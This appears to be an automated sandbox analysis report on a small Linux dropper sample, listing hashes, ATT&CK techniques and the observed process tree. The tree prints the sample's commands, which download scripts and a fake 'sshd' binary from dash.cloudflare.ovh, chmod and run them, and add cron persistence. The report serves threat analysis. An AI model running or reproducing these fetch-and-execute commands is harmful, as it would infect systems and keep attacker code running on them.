d2c57d24dbda375214c4df8c774533e91c3f75f87aa675a48d596ddd6df59651

Analysis

max time kernel
1s
max time network
128s
platform
ubuntu-24.04_amd64
resource
ubuntu2404-amd64-20240523-en
resource tags

arch:amd64arch:i386image:ubuntu2404-amd64-20240523-enkernel:6.8.0-31-genericlocale:en-usos:ubuntu-24.04-amd64system
submitted
21-12-2024 17:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ea7d79f0ddb431684f63a901afc596af24898555200fc14cc2616e42ab95ea5d.bin
Size

1KB
MD5

f105102404cda7e7de2ac1ae54d9a78c
SHA1

8ff5bcf2c69056780f0a7b51c96bba243dca2201
SHA256

ea7d79f0ddb431684f63a901afc596af24898555200fc14cc2616e42ab95ea5d
SHA512

587541b47ea669cd3a5cf952ed678b2399c9be0511455b3ac8476072fcb7a713489405a7f35506b7197674678350ead3437847d513fb63f4f8a9db447f99c92c

Score

7^/10

defense_evasion discovery execution persistence privilege_escalatio

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 12 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
2473	chmod
2497	chmod
2500	chmod
2507	chmod
2514	chmod
2517	chmod
2470	chmod
2477	chmod
2480	chmod
2490	chmod
2493	chmod
2510	chmod

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

execution persistence privilege_escalatio

Cron

T1053.003

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.Ami5fz	crontab

Command and Scripting Interpreter: Unix Shell 1 TTPs 2 IoCs

Execute scripts via Unix Shell.

execution

Unix Shell

T1059.004

pid	Process
2504	sh
2521	sh

Reads runtime system information 8 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/maps	grep
File opened for reading	/proc/sys/crypto/fips_enabled	curl

/tmp/ea7d79f0ddb431684f63a901afc596af24898555200fc14cc2616e42ab95ea5d.bin
/tmp/ea7d79f0ddb431684f63a901afc596af24898555200fc14cc2616e42ab95ea5d.bin
1⤵
PID:2464
- /usr/bin/wget
  wget -nc http://dash.cloudflare.ovh/dns/unix.sh -q -P /var/tmp/
  2⤵
  PID:2465
- /usr/bin/chmod
  chmod 777 /var/tmp/unix.sh
  2⤵
  - File and Directory Permissions Modification
  PID:2470
- /usr/bin/curl
  curl http://dash.cloudflare.ovh/dns/unix.sh -s -o /var/tmp/unix.sh
  2⤵
  - Reads runtime system information
  PID:2471
- /usr/bin/chmod
  chmod 777 /var/tmp/unix.sh
  2⤵
  - File and Directory Permissions Modification
  PID:2473
- /var/tmp/unix.sh
  ./unix.sh
  2⤵
  PID:2474
- /usr/bin/rm
  rm unix.sh
  2⤵
  PID:2475
- /usr/bin/wget
  wget -nc http://dash.cloudflare.ovh/dns/sshd -q -P /var/tmp/
  2⤵
  PID:2476
- /usr/bin/chmod
  chmod 777 /var/tmp/sshd
  2⤵
  - File and Directory Permissions Modification
  PID:2477
- /usr/bin/curl
  curl http://dash.cloudflare.ovh/dns/sshd -s -o /var/tmp/sshd
  2⤵
  - Reads runtime system information
  PID:2478
- /usr/bin/chmod
  chmod 777 /var/tmp/sshd
  2⤵
  - File and Directory Permissions Modification
  PID:2480
- /usr/bin/wget
  wget -nc http://dash.cloudflare.ovh/dns/config.json -q -P /var/tmp/
  2⤵
  PID:2481
- /usr/bin/curl
  curl http://dash.cloudflare.ovh/dns/config.json -s -o /var/tmp/config.json
  2⤵
  - Reads runtime system information
  PID:2482
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2484
- /usr/bin/grep
  grep -qxF
  2⤵
  - Reads runtime system information
  PID:2485
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:2487
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2488
- /usr/bin/wget
  wget -nc http://dash.cloudflare.ovh/dns/truct.sh -q -P /var/tmp/
  2⤵
  PID:2489
- /usr/bin/chmod
  chmod 777 /var/tmp/truct.sh
  2⤵
  - File and Directory Permissions Modification
  PID:2490
- /usr/bin/curl
  curl http://dash.cloudflare.ovh/dns/truct.sh -s -o /var/tmp/truct.sh
  2⤵
  - Reads runtime system information
  PID:2491
- /usr/bin/chmod
  chmod 777 /var/tmp/truct.sh
  2⤵
  - File and Directory Permissions Modification
  PID:2493
- /var/tmp/truct.sh
  ./truct.sh
  2⤵
  PID:2494
- /usr/bin/rm
  rm truct.sh
  2⤵
  PID:2495
- /usr/bin/wget
  wget -nc http://dash.cloudflare.ovh/dns/brict.sh -q -P /var/tmp/
  2⤵
  PID:2496
- /usr/bin/chmod
  chmod 777 /var/tmp/brict.sh
  2⤵
  - File and Directory Permissions Modification
  PID:2497
- /usr/bin/curl
  curl http://dash.cloudflare.ovh/dns/brict.sh -s -o /var/tmp/brict.sh
  2⤵
  - Reads runtime system information
  PID:2498
- /usr/bin/chmod
  chmod 777 /var/tmp/brict.sh
  2⤵
  - File and Directory Permissions Modification
  PID:2500
- /var/tmp/brict.sh
  ./brict.sh
  2⤵
  PID:2501
- /usr/bin/rm
  rm brict.sh
  2⤵
  PID:2502
- /usr/bin/flock
  /usr/bin/flock -n /var/tmp/vm.lock -c "cd /var/tmp; nohup ./sshd >/dev/null 2>&1 &"
  2⤵
  PID:2503
- - /bin/sh
    /bin/sh -c "cd /var/tmp; nohup ./sshd >/dev/null 2>&1 &"
    3⤵
    - Command and Scripting Interpreter: Unix Shell
    PID:2504
- /usr/bin/wget
  wget -nc http://dash.cloudflare.ovh/dns/retrict.sh -q -P /var/tmp/
  2⤵
  PID:2506
- /usr/bin/chmod
  chmod 777 /var/tmp/retrict.sh
  2⤵
  - File and Directory Permissions Modification
  PID:2507
- /usr/bin/curl
  curl http://dash.cloudflare.ovh/dns/retrict.sh -s -o /var/tmp/retrict.sh
  2⤵
  - Reads runtime system information
  PID:2508
- /usr/bin/chmod
  chmod 777 /var/tmp/retrict.sh
  2⤵
  - File and Directory Permissions Modification
  PID:2510
- /var/tmp/retrict.sh
  ./retrict.sh
  2⤵
  PID:2511
- /usr/bin/rm
  rm retrict.sh
  2⤵
  PID:2512
- /usr/bin/wget
  wget -nc http://dash.cloudflare.ovh/dns/politrict.sh -q -P /var/tmp/
  2⤵
  PID:2513
- /usr/bin/chmod
  chmod 777 /var/tmp/politrict.sh
  2⤵
  - File and Directory Permissions Modification
  PID:2514
- /usr/bin/curl
  curl http://dash.cloudflare.ovh/dns/politrict.sh -s -o /var/tmp/politrict.sh
  2⤵
  - Reads runtime system information
  PID:2515
- /usr/bin/chmod
  chmod 777 /var/tmp/politrict.sh
  2⤵
  - File and Directory Permissions Modification
  PID:2517
- /var/tmp/politrict.sh
  ./politrict.sh
  2⤵
  PID:2518
- /usr/bin/rm
  rm politrict.sh
  2⤵
  PID:2519
- /usr/bin/flock
  /usr/bin/flock -n /var/tmp/vm.lock -c "cd /var/tmp; nohup ./sshd >/dev/null 2>&1 &"
  2⤵
  PID:2520
- - /bin/sh
    /bin/sh -c "cd /var/tmp; nohup ./sshd >/dev/null 2>&1 &"
    3⤵
    - Command and Scripting Interpreter: Unix Shell
    PID:2521

/usr/bin/nohup
nohup ./sshd
1⤵
PID:2505

/var/tmp/sshd
./sshd
1⤵
PID:2505

/usr/bin/nohup
nohup ./sshd
1⤵
PID:2522

/var/tmp/sshd
./sshd
1⤵
PID:2522

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Unix Shell

T1059.004

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/var/spool/cron/crontabs/tmp.Ami5fz

Filesize
176B

MD5
6db53582c82e9513cb57bbf2a116678a

SHA1
7c9aa56190ba0e8b86d26ed31a1146c53c6db781

SHA256
da50601f7bff0cbae6cdd0ab474b1af6dbaaa85b1b6fd73268990ec0da9b31dc

SHA512
973aca39e326cf49f64d4519a94ba29072738cd505b9188330c982ec88f9de03c3ee13d5975dade56b6fe4de4f90b860932a03ddb4dd782703cbb41530c5ff05

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads